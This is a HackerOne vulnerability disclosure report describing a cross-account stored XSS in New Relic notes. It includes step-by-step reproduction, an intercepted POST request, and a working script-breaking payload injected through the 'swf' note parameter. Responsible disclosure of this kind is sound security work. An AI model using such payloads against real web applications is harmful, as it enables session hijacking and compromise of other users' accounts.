New Relic: Cross-account stored XSS at notes (through "swf" note parameter)

2019-10-09T14:11:30
ID H1:710535
Type hackerone
Reporter skavans
Modified 2020-08-13T11:05:56

Description

Hey team,

I've found one more stored XSS, this one is inside a note. Since notes could be published to be available for any NR user (cross-accountly), the impact is quite severe. You can see the publicly-available payload here: https://rpm.newrelic.com/public/notes/4qovMmDXV7P {F603334}

Steps to reproduce

1) Sign into NR 2) Navigate to some app (APM,mobile,etc.) 3) Choose any chart that can be embed into a note, click Add to note, then click Save and close, intercept the request with Burp Suite, it is like the following: ```http POST /accounts/2385914/notes?agent_id=173790664 HTTP/1.1 Host: rpm.newrelic.com <redacted>

utf8=%E2%9C%93&authenticity_token=ebHrvqEzOZ9Aj%2BffyB6%2FoAOPe7ecrKlb7kyTJVeO7HY%3D&app_name=newapp&note_item%5Bswf%5D=&note_item%5Bbegin_time%5D=2019-10-08T07%3A00%3A45-07%3A00&note_item%5Bend_time%5D=2019-10-09T07%3A00%3A45-07%3A00&note_item%5Btitle%5D=Apdex+score&note_item%5Bdata_url%5D=%2Fchart_data%2Fbase_charts%2Fcombined_apdex_rainbow.json%3Faccount_id%3D2385914%26agent%3D173790664%26application_id%3D173790664%26chartBottomMargin%3D55%26chart_type%3DMSLine%26current_product%3Dapm_product%26hideXAxisLabels%3Dtrue%26include_metric_guids%255B%255D%3D5b224170646578225d%26include_metric_guids%255B%255D%3D5b22456e64557365722f4170646578225d%26labelStep%3D3%26live%3Dtrue%26no_click%3Dfalse%26number_suffix%3D%26omit_markers%3Dtrue%26render_to%3Dcurrent_apdex_score_173790664%26title%3D%26tooltipGroup%3Dcurrent_charts%26tw%255Bdur%255D%3Dlast_24_hours%26tw%255Bend%255D%3D1570629645%26zoom%3Dtrue%26no_click%3D1%26no_links%3D1&note_item%5Bcontext_url%5D=%2Faccounts%2F2385914%2Fapplications%2F173790664%3Ftw%255Bdur%255D%3Dlast_24_hours&note_item%5Bnote_text%5D=&note_action=create&note_id=6621&action_after=save_and_close 4) Add the following parameter to the intercepted request (you can add it after all other parameters, for instance): &note_item%5Bswf%5D=</script><svg/onload=alert(document.domain)> 5) Server response contains created note ID, navigate to this note: https://rpm.newrelic.com/accounts/&lt;ACC_ID&gt;/notes/&lt;NOTE_ID&gt; and make sure the payload is executed 6) Inspect the page source and make sure the payload is injected inside the following script:html <script type="text/javascript"> jQuery(function($) { var chart_options = {"swf":"</script><svg/onload=alert(document.domain)>WorldwithCountries","width":"100%","height":200,"fluid":true,"snappable":false,"loadingOverlay":true,"render":true}; chart_options.dataUrl = '/accounts/2385914/notes/6625/items/19898/chart_data?tw%5Bdur%5D=last_24_hours&tw%5Bend%5D=1570629645'; $('#div_chart_note_item_19898_chart').chart(chart_options); }); </script> ``` 7) You can also publish this note and make sure that the payload is active also at public note version.

PoC video:

{F603345}

Impact

Cross-account active stored XSS